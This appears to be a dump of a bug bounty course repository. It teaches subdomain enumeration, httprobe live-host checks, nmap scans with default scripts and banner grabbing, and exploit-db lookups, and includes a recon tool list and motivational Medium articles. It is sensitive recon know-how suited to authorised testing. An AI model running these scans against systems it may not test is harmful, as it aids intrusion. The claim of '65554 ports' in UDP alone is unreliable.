\n", "content_type": "JSON"}] -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Subdomain_Enum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Subdomain_Enum.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 1.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 2.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 3.png: 
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 3.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled 1.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/2 Processing Our List Of Subdomain 6bf06bf770584289a8abd9e63c7bf2bd.md:
--------------------------------------------------------------------------------
# 2. Processing Our List Of Subdomain

# Intro

Now that we have a (hopefully big) list of potential subdomains, a big part of the hard work is over. Yaaaay! But we don't have a vulnerability yet, so we will have to keep digging deeper into our list of subdomains to find that hidden gem that hopefully others missed. That's why it's so important to have a really solid list of subdomains and why we should do our subdomain enumeration at such a high level.

We are going to process our list of subdomains with httprobe to see which subdomains are live and which don't respond at all. We are going to take care to log all subdomains which return an answer. It doesn't matter if we get an error code, because an error code also means that the subdomain is live.

# HTTProbe

The description on the GitHub page of HTTProbe is very simple.

> Take a list of domains and probe for working http and https servers.

We first need to install HTTProbe:

```bash
go get -u github.com/tomnomnom/httprobe

# We also have to make sure the go/bin folder is added to the $PATH variable,
# because that's where httprobe is installed
export PATH=$PATH:$HOME/go/bin
```

If we don't have Go installed, we need to install that as well of course:

[https://golang.org/doc/install](https://golang.org/doc/install)

Since I use WSL and Ubuntu I execute the following command, but it can differ per OS of course:

```bash
sudo apt install golang-go
```

Now we can start checking the massive list we gathered from the previous chapter.
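The live-host check that httprobe performs, written out as an added Python example (not part of the course and not httprobe's own code) so the rule from the text is visible in code: every candidate is tried on both schemes, any HTTP response at all, including a 4xx or 5xx status, counts as alive, and only hosts that never answer are dropped. The network call is passed in as a parameter, so the same `probe` function runs offline against the constructed `FAKE_RESPONSES` table; `default_fetch` is the real HEAD-request implementation and is an assumption about how one would wire it up, not how httprobe is implemented.

```python
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional

SCHEMES = ("http://", "https://")


def default_fetch(url: str, timeout: float = 5.0) -> Optional[int]:
    """Return the HTTP status code for url, or None if no server answered.

    urllib raises HTTPError for 4xx/5xx responses, but a 403 or a 500 still
    means something is listening, so the status is returned rather than
    treated as a failure. Only connection-level errors map to None.
    """
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"User-Agent": "probe-example"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except (urllib.error.URLError, OSError, ValueError):
        return None


def probe(hosts: Iterable[str],
          fetch: Callable[[str], Optional[int]] = default_fetch) -> List[str]:
    """Return the URLs that answered, in input order, one per scheme that
    responded, the same shape httprobe prints."""
    alive: List[str] = []
    for host in hosts:
        host = host.strip()
        if not host or host.startswith("#"):
            continue  # blank lines and comments in the input list
        for scheme in SCHEMES:
            url = scheme + host
            if fetch(url) is not None:
                alive.append(url)
    return alive


# Constructed stand-in for the network; these are documentation names, not
# real hosts. Anything missing from the table behaves like a dead host.
FAKE_RESPONSES = {
    "http://www.example.com": 200,
    "https://www.example.com": 200,
    "http://old.example.com": 403,    # error code, but the host is alive
    "https://api.example.com": 500,   # only https answers
}

SAMPLE_LIST = ["www.example.com", "old.example.com", "api.example.com",
               "dead.example.com", "", "# a comment line"]


def fake_fetch(url: str) -> Optional[int]:
    return FAKE_RESPONSES.get(url)


if __name__ == "__main__":
    for url in probe(SAMPLE_LIST, fetch=fake_fetch):
        print(url)
```

Running it against the constructed table keeps `old.example.com` (403) and `api.example.com` (500 on https only) and drops `dead.example.com`, which is exactly the distinction the text asks for: reachability, not a 200.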
```bash
cat recon/example/domains.txt | httprobe >> working-domains-google.com.txt
```

This will create a new file with all the domains that returned an answer, indicating they are alive. By default this will scan port 80 and port 443.

We can set several flags, but I usually use the default settings as they seem to be sufficient.

# Results

We should now be left with a file that contains nothing but subdomains that are alive, but this still isn't going to lead us to any vulnerabilities. We need this list though to continue to the next step.

This is where we can choose one of two paths:

- Further exploration of the alive domains (indicated by the numbers in front of the chapter titles)
- Vulnerability scanning of the alive domains (indicated by the letters in front of the chapter titles)

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a.md:
--------------------------------------------------------------------------------
# 4. Exploiting open ports

# Introduction

While we manually explore the results from our subdomain takeover, it's always good to have some automatic scans running, and since I run mine on a VPS (see chapter 98. Using a VPS) I can run some pretty big scans and have them running for a while during my exploration of the targets. For this reason I usually skip straight to port scanning with nmap with the -sC and -sV flags (more on their meaning later) enabled all of the time. I know that some of us have to hack on a literal potato though, so I will start with the most basic port scans and move on from there.

# How do we do it?

To exploit an open port, we first have to know what ports are open and what is running on that port. To do this we have a tool called Nmap. This tool is essential in any pentester's tool belt in my opinion.

[https://nmap.org/](https://nmap.org/)

We can take two strategies when it comes to an nmap scan: we can either scan every target individually and have a look at the results, or we can try to scan the entire list of subdomains we have found at once. If you already know nmap a little bit you might be used to working with IP addresses, but domains resolve to an IP address as well, which in turn we can do a port scan on.

We will describe both techniques, since nmap can work with a list as well.

```bash
# Scanning a list:
nmap -iL list-of-ips.txt -oA scan
# -iL stands for input list
# -oA writes the output in all formats (normal, grepable and XML), here as scan.nmap, scan.gnmap and scan.xml

# Or a single target:
nmap xx.xx.xx.xx
```

This will scan for the default top 1000 ports, but there are 65554 ports possible and that's just in UDP, there's also TCP left, so if you want to do a more intense scan that's also possible, though I do not recommend doing this on a list of URLs since it can take an extremely long time to complete.

```bash
nmap xx.xx.xx.xx -p-
# all the ports

nmap xx.xx.xx.xx -sT
# a TCP connect scan

nmap xx.xx.xx.xx -sT -p-
# all TCP ports

nmap xx.xx.xx.xx -sS
# a TCP SYN scan
# https://www.youtube.com/watch?v=UHvuH07BQ6w for more info
```

The results of this should be a list of subdomains of which we know what ports are open and what not. We can then let nmap automate even more of our work and check for banners on those ports and even execute certain scripts to test for vulnerabilities where possible, though these scripts are of course limited in their capacity.

```bash
nmap xx.xx.xx.xx -p 80,81,22,443 -sC -sV
# -p only scans these ports
# -sC runs the default scripts on those ports
# -sV grabs the banners to show the version numbers
```

If we throw all this together and want to run this on a list of subdomains and we don't mind how long it runs, we can execute the following command.

```bash
nmap -iL list.txt -p- -sC -sV
# Scan all the ports with banner grabbing
# and default scripts on the hosts from list.txt
```

# The results

This will leave you with a list of subdomains, their open ports and, if the banner grabbing was successful, what is running on that port and possibly the version number. This will allow us to do an exciting night of digging through exploit-db to see if those software versions are vulnerable.

[https://www.exploit-db.com/search](https://www.exploit-db.com/search)

We can set some pretty deep options with some elaborate settings in exploit-db's search fields, as seen on the screenshot below.

![4%20Exploiting%20open%20ports%2028f4a661e49d42748c33b352ad34dc1a/Untitled.png](4%20Exploiting%20open%20ports%2028f4a661e49d42748c33b352ad34dc1a/Untitled.png)

If exploit-db doesn't offer any consolation there's always Google. I usually enter a very straightforward search query, 'exploit jira xx.xx' for example. If I find a trace I might have another trail to investigate in exploit-db. I keep returning there because I know that every exploit in there has a PoC I can use to prove my impact if need be. Remember that you HAVE to be able to demonstrate impact in a proper PoC! No PoC = No Impact = No Issue = No bounty for you, and you don't want to let that hard work go to waste.

Where we go from here can vary wildly and is outside of the scope of this course.
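When the `-sC -sV` scan runs over a whole list with `-oA`, the useful output is the XML file, and reading it by hand for dozens of hosts is where mistakes creep in. The block below is an added example, not part of the course: it turns nmap's XML into one record per open port and builds the "host:port product version" lines the chapter says to take to exploit-db, while marking services nmap only guessed from the port table (`method="table"`) so a guess is not mistaken for a read banner. `SAMPLE_XML` is a constructed, trimmed-down document for the documentation address 192.0.2.10, not a real scan; `parse_nmap_xml` and `version_summary` are names chosen for this example.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Union

# Constructed, trimmed-down nmap XML (not the output of a real scan). A real
# scan.xml carries many more attributes, but the elements used here are the
# ones nmap always emits: host/status, host/address, hostnames, ports/port.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sC -sV -oA scan 192.0.2.10" version="7.94">
<host><status state="up" reason="syn-ack"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<hostnames><hostname name="old.example.com" type="user"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="7.4" extrainfo="protocol 2.0" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="nginx" version="1.18.0" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/>
<service name="https" method="table" conf="3"/></port>
<port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
<service name="http-proxy" method="table" conf="3"/></port>
</ports></host>
<host><status state="down" reason="no-response"/>
<address addr="192.0.2.11" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(xml_text: Union[str, bytes], open_only: bool = True) -> List[Dict[str, object]]:
    """One record per port of every host that was up. With open_only (the
    default) filtered and closed ports are skipped."""
    root = ET.fromstring(xml_text)
    records: List[Dict[str, object]] = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # nothing was learned about hosts that did not answer
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        addr = addr_el.get("addr", "") if addr_el is not None else ""
        name_el = host.find("hostnames/hostname")
        hostname = name_el.get("name", "") if name_el is not None else ""
        for port in host.findall("ports/port"):
            state_el = port.find("state")
            state = state_el.get("state", "") if state_el is not None else ""
            if open_only and state != "open":
                continue
            svc_el = port.find("service")
            svc = svc_el.attrib if svc_el is not None else {}
            records.append({
                "host": addr,
                "hostname": hostname,
                "port": port.get("portid", ""),
                "proto": port.get("protocol", ""),
                "state": state,
                "service": svc.get("name", ""),
                "product": svc.get("product", ""),
                "version": svc.get("version", ""),
                # method="probed" means -sV actually read a banner;
                # method="table" means nmap only guessed from the port number.
                "confirmed": svc.get("method") == "probed",
            })
    return records


def version_summary(records: List[Dict[str, object]]) -> List[str]:
    """'host:port/proto product version' lines for the exploit-db search.
    Guessed services are labelled unconfirmed rather than given a version."""
    lines = []
    for r in records:
        if r["confirmed"]:
            label = f"{r['product']} {r['version']}".strip()
        else:
            label = f"{r['service']} (unconfirmed)"
        lines.append(f"{r['host']}:{r['port']}/{r['proto']} {label}")
    return lines


if __name__ == "__main__":
    # With a real scan: parse_nmap_xml(open("scan.xml", "rb").read())
    for line in version_summary(parse_nmap_xml(SAMPLE_XML)):
        print(line)
```

The `confirmed` flag is the caveat worth keeping in mind before a night on exploit-db: a port 8080 entry called `http-proxy` with `conf="3"` is a name from nmap's port table, not evidence of what is running there.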
--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a/Untitled.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 1.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 2.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/99 List of tools for grabbing subdomains 788400d9c9d14a79b45c2fb1f6463692.md:
--------------------------------------------------------------------------------
# 99. List of tools for grabbing subdomains

## General Tools

1. [SubFinder](https://github.com/projectdiscovery/subfinder)
2. [Findomain](https://github.com/Findomain/Findomain)
3. [Sublist3r](https://github.com/aboul3la/Sublist3r)
4. [dnssearch](https://github.com/evilsocket/dnssearch)
5. [Sudomy](https://github.com/Screetsec/Sudomy)
6. [Assetfinder](https://github.com/tomnomnom/assetfinder)
7. [Vita](https://github.com/junnlikestea/vita)
8. [PureDNS](https://github.com/d3mondev/puredns)
9. [GetAllUrls (gau)](https://github.com/lc/gau)

## Frameworks

1. [Amass](https://github.com/OWASP/Amass)
2. [Sudomy](https://github.com/Screetsec/Sudomy)
3. [ReconFTW](https://github.com/six2dez/reconftw)
4. [DMitry](https://securitytrails.com/blog/dmitry-osint-tool)

## Dictionary attacks

1. [knockPy](https://github.com/guelfoweb/knock)
2. [DNSRecon](https://github.com/darkoperator/dnsrecon)
3. [MassDNS](https://github.com/blechschmidt/massdns)

## Datasets

1. [crt.sh](https://crt.sh/)
2. [WaybackURLS](https://github.com/tomnomnom/waybackurls)

## Permutation Scanning

1. [AltDNS](https://github.com/infosec-au/altdns)

## DNS Databases

1. [DNS Dumpster](https://dnsdumpster.com/)
2. [Shodan](https://snippets.shodan.io/c/83ldc9nef1Tp2R8C)
3. [Pentest-tools](https://pentest-tools.com/information-gathering/find-subdomains-of-domain)
4. [Rapid7 Forward DNS (FDNS)](https://opendata.rapid7.com/sonar.fdns_v2/)
5. [Crobat](https://github.com/lnxcrew/crobat)
6. [Subdomain finder by c99.nl](https://subdomainfinder.c99.nl/)
7. [BufferOver](http://dns.bufferover.run/dns?q=)
8. [Spyse](https://spyse.com/)

## Checking SubDomain Status Code

1. [URLChecker](https://github.com/evanRubinsteinIT/URLChecker)
2. [HTTProbe](https://github.com/tomnomnom/httprobe)

## Bash Extra resources

```bash
curl -s https://rapiddns.io/subdomain/example.com?full=1 | grep -oP '_blank">\K[^<]*' | grep -v http | sort -u
```

1. curl -s [https://rapiddns.io/subdomain/example.com?full=1](https://rapiddns.io/subdomain/example.com?full=1) >>>> Will download the page listing all the subdomains from rapiddns
2. grep -oP '_blank">\K[^<]*' >>>> Will grep the text of all the links that open in a new tab
3. grep -v http >>>> Will drop the lines that contain http (the full links), leaving only the hostnames
4. sort -u >>>> Will then sort the list and remove duplicates

- [https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/recon-and-osint/subdomain-enumeration](https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/recon-and-osint/subdomain-enumeration)
- [https://github.com/CristinaSolana/subdomain-recon](https://github.com/CristinaSolana/subdomain-recon)
- [https://github.com/ARPSyndicate/kenzer](https://github.com/ARPSyndicate/kenzer)
- [https://github.com/bing0o/SubEnum](https://github.com/bing0o/SubEnum)
- [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py)

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_scanning.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_scanning.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_template_cheat_sheet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_template_cheat_sheet.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Untitled.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff/vulnerability_scanning_(1).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff/vulnerability_scanning_(1).png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 1.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 2.png

--------------------------------------------------------------------------------
/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 3.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled.png -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5.md: -------------------------------------------------------------------------------- 1 | # Medium articles 2 | 3 | [How to become a hacker](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/How%20to%20become%20a%20hacker%202cecb0bb861f47e081a40246e1e43b47.md) 4 | 5 | [Are you a competitive hacker?](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Are%20you%20a%20competitive%20hacker%20383f929eda6c4206a762fa12c189b1b5.md) 6 | 7 | [Docker: A Bug Bounty Hunters Best Friend](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Docker%20A%20Bug%20Bounty%20Hunters%20Best%20Friend%20df662f7e0f1a4c8290b76f8d640ded4b.md) 8 | 9 | [How to handle failure](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/How%20to%20handle%20failure%20c4edf74994974bb388eecaddc2210199.md) 10 | 11 | [[Bugbountyhunter.com](http://bugbountyhunter.com) membership](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Bugbountyhunter%20com%20membership%20fbd44fccb0e648f6b04fe523218e7aad.md) 12 | 13 | [Rat's mobile 
methodology](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Rat's%20mobile%20methodology%203adef0ef48cb4a479ac8bf1242be6957.md) -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Are you a competitive hacker 383f929eda6c4206a762fa12c189b1b5.md: -------------------------------------------------------------------------------- 1 | # Are you a competitive hacker? 2 | 3 | # Intro 4 | 5 | A little while ago, i asked you guys via twitter if you are a competitive person. A lot of you guys gave me some amazing answers and i wanted to turn my inspiration into a video for you all to enjoy. 6 | 7 | One of the things i noticed is that everyone has a different view on this topic, though some people have some common points to their view and these are the ones i would like to share with you. 8 | 9 | # The Three types of people 10 | 11 | I have noticed three big lines of thought, of which i will go over each of these and give you my view. 12 | 13 | Some background about me ... i am a very non competitive person. I am more of a cooperation person but i also see where the difficulties lie in that and i realise we do not live in a utopia. My characteristics seem to be shared by many of you and that brings me great joy. It shows me that the world is open to work together and i hope i can provide an environment for you all to grow in in the form of a discord channel in the description below. 14 | 15 | A different kind of person i encountered seemed to be more competitive. The majority of this group seemed to mostly competitive against themselves which really surprised me... but it also did not. I immediately recognised parts of myself in that answer. As a perfectionist, which i think many of you share as a character trait, i am often trying to be better than i was yesterday just like so many of you. We are performing at a TOP level guys, do not forget to be proud of yourself. 
16 | 17 | The last type of person I encountered seemed to be more passive. And now the real kicker... i also recognize myself in that. It may seem like a negative trait but if i drill down into the motivations of these people it’s not that they do not actively try to engage. It’s that they engage to help others grow. 18 | 19 | This is an inherent beauty that i hope i can imprint on each and every one of your amazing hackers. I hope that you can learn from one another and that we can all use this as inspiration, as fuel for the fire inside of us to burn bright my friends. You should be competitive. You should be passive and compassionate and you should always strive to be one step ahead of yesterday. This is what keeps us young. 20 | 21 | Thank you all for watching this far. Thank you for everything, i am excited beyond the moon for the fact that i found my home in a community that i have looked up to ever since i was a kid. Today is a good day and tomorrow will be even better. Go and shine bright, you amazing hackers. You are all stars in my humble opinion. -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Bugbountyhunter com membership fbd44fccb0e648f6b04fe523218e7aad.md: -------------------------------------------------------------------------------- 1 | # Bugbountyhunter.com membership 2 | 3 | Hello Amazing hackers 4 | 5 | I Hope you are all doing well today! 6 | 7 | First of all i would like to extend a big thank you to [bugbountyhunter.com](http://bugbountyhunter.com) for making this video possible. I Recently had the chance to try out their premium membership and i am in love. 8 | 9 | Let’s go over some of the features the website has to offer and show you what you can expect for your fee, i promise you will not be disappointed. 10 | 11 | The first thing i want to talk about is Sean’s methodology. 
He doesn’t just talk about what vulnerabilities to look for but also how he looks for them and what makes a parameter suspicious. Besides all of this he also helps you with the more practical issues of bug bounties such as picking a good target that fits you and report writing. As an expierenced bug bounty hunter, i can personally vouch for his methodology. It looks very similar to mine and besides that, i learned quite a lot from just reading the PDF. 12 | 13 | Now this may seem sweet but I promise you that it’s just the tip of the iceberg. What [bugbountyhunter.com](http://bugbountyhunter.com) offers as well is a web application called Barker. Barker is developed with vulnerabilities built into it that are based on real vulnerabilities from real targets. Again, as a bug bounty hunter i can confirm these issues are very lifelike and look exactly like what i would find when hunting in the wild. On top of the existing vulnerabilities, Barker is updated regularly with cool new vulnerabilities. 14 | 15 | Besides the fact that Barker is amazing, there is also a real reporting system. You can actually report the issues you find and they will be triaged like they would be in a real life scenario. This not only helps you with finding issues but also with improving your reporting which in my opinion is the most important skill a hunter could have because if you can’t prove that there is a vulnerability, you won’t get rewarded or it will take a considerably longer time. 16 | 17 | As if all of this was not enough yet, you also get lifetime access to the bugbountyhunter discord and the possibility to join hacking fridays. Full disclosure though, you need to submit 25 valid bugs and level up to join the hacking fridays but it’s totally worth it and should not take you long at all if you follow the methodology. Hacking Fridays is where the group focusses on a chosen target and exchange idea’s while splitting the bounty. 
To finish up and answer your question whether or not [bugbountyhunter.com](http://bugbountyhunter.com) membership is worth it? YES! For that price you get a full methodology, a simulated target to practice on, a real reporting system and you get to hack with the pros... 100% recommended for the money.

--------------------------------------------------------------------------------
(image assets of /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/: 05C5F6F5-4262-4DFD-B4BA-8583D3051CDD.png, 603D9F12-65F0-4FFC-A2F7-58AF6B4BDEF0.png, 84591517-86DD-4538-84FA-23E99431FB1F.jpeg, D973DC7A-046A-4223-A315-5B1A3AE06058.jpeg; not reproduced here)
--------------------------------------------------------------------------------
/notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/How to handle failure c4edf74994974bb388eecaddc2210199.md:
--------------------------------------------------------------------------------
# How to handle failure

Hello Amazing person, if you are like me, you probably know the feeling of failure. You probably know what it feels like to be denied your goals and to hate the feeling that follows.

- To not hack that machine you’ve been trying to hack all week
- To not find any vulnerabilities after hunting for a week
- To not pass that OSCP exam on your first try, which you can’t stand

These feelings are normal and I want to talk to you about how you can handle them.

First of all, it’s important that you understand it’s okay to feel sad and down and that it’s okay to fail. This might seem very obvious, but please don’t underestimate this. Think back to the last exam you failed and how you felt, I bet you it was anything but okay.
That being said, I am sure you drew a lesson from that instance and I am sure it made you into a better person and I hope you can see that every failure which leads to a failure is not a failure after all ... it’s merely a lesson.

That, my dear viewer/reader, is the essence of learning. We have to make mistakes in order to understand what we should and should not do because, let’s be honest, it’s not easy to explain every little detail to another person. What we know is known to us but we often can’t explain all the things we feel and touch and experience. Language often falls short for us and that’s why it’s so important that we all make our own mistakes in a safe environment.

I hope this helps you see that failure is not something we should try to shy away from or actively avoid, but that we can make an equally big mistake by not learning anything from mistakes and failures, and an even bigger mistake by not allowing ourselves to feel bad about it if that’s what our brain needs.

